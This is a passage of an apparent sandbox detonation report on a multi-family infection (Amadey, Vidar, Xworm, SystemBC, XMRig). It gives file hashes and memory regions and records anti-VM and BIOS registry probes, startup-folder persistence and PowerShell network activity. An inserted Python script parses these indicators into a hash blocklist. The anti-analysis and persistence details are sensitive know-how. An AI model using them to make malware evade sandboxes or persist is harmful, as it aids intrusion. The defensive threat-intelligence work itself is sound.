C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
memory/2232-943-0x0000000000360000-0x0000000000A4E000-memory.dmp
C:\ProgramData\2nop8\ymymyu
| MD5 | c6e1c1cbdbbafc9a480164efdde33bac |
| SHA1 | c3de5624376ec2918635fac16d3a945d93825c63 |
| SHA256 | b3689e167043c3c63604862e688330cbb969cc05104f5ec153e5db0d980567cc |
| SHA512 | fc79e9062663787cbdaa6901a4a94cf692292d91ceb580deb81d3f0601fc11044d21599b711fa47d3bf4a3030b12db2b34a98a04e44aa8a7cdb6ecf63d96df9b |
C:\ProgramData\2nop8\lx4ozm
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\ProgramData\EF742872A369CDF0.dat
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\ProgramData\18778BF760B0D867.dat
| MD5 | 6093b9b9effe107a1958b5e8775d196a |
| SHA1 | f86ede48007734aebe75f41954ea1ef64924b05e |
| SHA256 | a10b04d057393f5974c776ed253909cafcd014752a57da2971ae0dddfa889ab0 |
| SHA512 | 2d9c20a201655ffcce71bfafa71b79fe08eb8aa02b5666588302608f6a14126a5a1f4213a963eb528514e2ea2b17871c4c5f9b5ef89c1940c40c0718ec367a77 |
C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe
| MD5 | 7c169698effcdd45b7cbd763d28e87f5 |
| SHA1 | 4f9db666d66255cd7ca2b0973ff00eae8b155f7a |
| SHA256 | c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b |
| SHA512 | 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3 |
C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe
| MD5 | 2012699a5e85cd283323c324aa061bc7 |
| SHA1 | 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f |
| SHA256 | 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5 |
| SHA512 | 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683 |
C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe
| MD5 | e935a122d4c4e9c1b44368821a5154ff |
| SHA1 | c93e4b9fb9563cb04a9cd39c75220eaf6007f98f |
| SHA256 | 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4 |
| SHA512 | 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 3a323a53ef7554fc415585baabacc2cf |
| SHA1 | 9d6af00ea3c5e84c17321e022b395b22c7994c9a |
| SHA256 | 160e98106f6fea6b8b4c60ce2f6fab5c912b61e6afbf78f603c9a841769a9f07 |
| SHA512 | 778677921c66efa0987fbd47b84788b16dac424d3db3bf890fda91bd61dc8117401122e27f81e31a7a304f87ddeaf1bb2caf0d64689899f92ba5822d8e4926fa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\d41625c8-9be6-404d-b6d9-28e68e206bec
| MD5 | 89054adf1cdefc3a754853aece29d215 |
| SHA1 | f3ebd5f373909ebf6bedcfbf3e7be5bcf698fc48 |
| SHA256 | d68ccf6a24ff7e4a4beaf0caf061d957aa435864a71e93c9a0bba8658d5b0e8e |
| SHA512 | f559177de099bbbea03f3d91cad51bec9e1af27c859404536b7cde51006255b426063cc5b3d57ab5b468b3c72e1b90b57d45ee26ff8755b821bd793a73e742f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\8260db59-ce4a-4ec5-8fc7-a6923b96376e
| MD5 | be05a61ddcf57f2796b22e27d8ea9841 |
| SHA1 | 065c5fca85f8a682e0c9220386013e964a1c936a |
| SHA256 | 0d939c02e8e6871c311a3bf416b499c738809b15d642d5bea75bcb53f387acc2 |
| SHA512 | 1c4df25ae13b6f3be138b6c3f63f1ec22ae973d60c43b74c23549d0f7404b401446443306f2565073e826e73861f2ace265aace0837566771b69809e6352fc7f |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | af3dc27d55fc2649cb5325fca88f451d |
| SHA1 | 2f099ca412059d812b34fd2cb2d89329a154448a |
| SHA256 | 97e90c239700a709af25f61cb41ee30ec58ef5b8251d1df67133b2d4d3cf22fb |
| SHA512 | 8f861d3b547c0bcb90efa6ba52471f8181ba4aa88702cec20918c913b2a77568246caef1ad20bdc1583d0926be0d1913292d2cede549afc994dfbb6ffcfe6f23 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js
| MD5 | 317125259ae765765ee11cf30c473e32 |
| SHA1 | 50c861defa414557c6ae70abce9e932259cfc509 |
| SHA256 | 516c9e00bfe740ed3c1f0087e4f75d5bb4acc78fb3b196c91bd7d50976602632 |
| SHA512 | c4333f1da1c9968556d517ff4f94ec1911bf570f85161ffe543ee3768f1fb4b95fc0479380d9ec2d0cd51a8ea9414d0c55e5e500e12d64f743fd21530ffdeeba |
C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe
| MD5 | e787e8998f5306a754d625d7e29bbeb5 |
| SHA1 | 14e056dbf0b3991664910ee3a1d23a4bb2c0253d |
| SHA256 | 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d |
| SHA512 | 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6 |
memory/4084-1424-0x0000000000310000-0x0000000000782000-memory.dmp
memory/4084-1425-0x0000000000310000-0x0000000000782000-memory.dmp
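The listing above mixes dropped-file blocks (a path followed by headerless MD5/SHA1/SHA256/SHA512 rows) with `memory/<pid>-<seq>-<start>-<end>-memory.dmp` entries in event order. The Python below is an added example, not part of the sandbox report, that parses that layout into IOC records, separates droppers and ProgramData artifacts from Chrome/Firefox/IE housekeeping files, sizes each memory region, and recognises cached responses whose digest is that of a trivial body: the `service[1].htm` digests on the page are the MD5/SHA1/SHA256 of the single character `0`, so that C2 reply is known to be exactly "0" even though the file itself is not shown. The sample listing is a constructed excerpt whose paths and digests are copied from the page; the noise markers and payload extensions are this example's assumptions.

```python
"""Turn the dropped-file / memory-dump listing of a sandbox report into IOC records."""
import hashlib
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (paths and digests copied from the
# page): a path line, then headerless "| MD5 | ... |" rows, with
# memory/<pid>-<seq>-<start>-<end>-memory.dmp lines interleaved in event order.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
memory/1748-380-0x0000000000400000-0x0000000000466000-memory.dmp
memory/1748-377-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
C:\ProgramData\2nop8\myuaas2db
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
"""

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Assumed path fragments that mark browser/shell housekeeping rather than malware output.
NOISE_MARKERS = ("\\Google\\Chrome\\User Data\\", "\\Mozilla\\Firefox\\",
                 "\\Temporary Internet Files\\", "\\Recent\\CustomDestinations\\")
PAYLOAD_EXT = (".exe", ".dll", ".cmd", ".bat", ".vbs", ".ps1", ".lnk", ".dat")

# SHA-256 of a few trivial bodies; a cached C2 response hashing to one of these is
# known to contain exactly that text even though the file itself is not on the page.
TRIVIAL_BODIES = {hashlib.sha256(b).hexdigest(): b.decode() for b in (b"", b"0", b"1", b"ok")}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)   # algorithm -> lowercase hex digest

    @property
    def category(self) -> str:
        if any(marker in self.path for marker in NOISE_MARKERS):
            return "browser-noise"
        if self.path.lower().endswith(PAYLOAD_EXT) or "\\ProgramData\\" in self.path:
            return "payload"
        return "other"

    @property
    def known_content(self):
        """The literal file body when its SHA-256 matches a trivial string, else None."""
        return TRIVIAL_BODIES.get(self.hashes.get("SHA256"))


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text: str):
    """Return (dropped files, memory regions) parsed from the listing text."""
    files, regions, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(seq), int(start, 16), int(end, 16)))
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:        # catches truncated copy-pastes
                raise ValueError(f"{algo} digest has wrong length: {line}")
            if current is None:                      # excerpt started mid-block; keep the digest
                current = DroppedFile("<path not in excerpt>")
                files.append(current)
            current.hashes[algo] = digest
            continue
        current = DroppedFile(line)                  # any other line is a path opening a new block
        files.append(current)
    return files, regions


def payload_sha256s(files) -> list:
    """Blocklist-ready digests: executables and ProgramData artifacts only, browser noise dropped."""
    return sorted({f.hashes["SHA256"] for f in files
                   if f.category == "payload" and "SHA256" in f.hashes})


if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE_LISTING)
    for f in files:
        body = f"  [body is {f.known_content!r}]" if f.known_content is not None else ""
        print(f"{f.category:14} {f.hashes.get('SHA256', '?')[:16]}...  {f.path}{body}")
    for r in regions:
        print(f"pid {r.pid} seq {r.seq}: 0x{r.start:X}-0x{r.end:X} ({r.size} bytes)")
```

Call `parse_listing` on the whole pasted section rather than the excerpt; a digest row without a preceding path (as on the first line of this section) is kept under a placeholder path instead of being dropped, and `payload_sha256s` is what goes to the blocklist.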
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:58
Reported
2025-03-05 23:00
Platform
win10v2004-20250217-en
Max time kernel
138s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
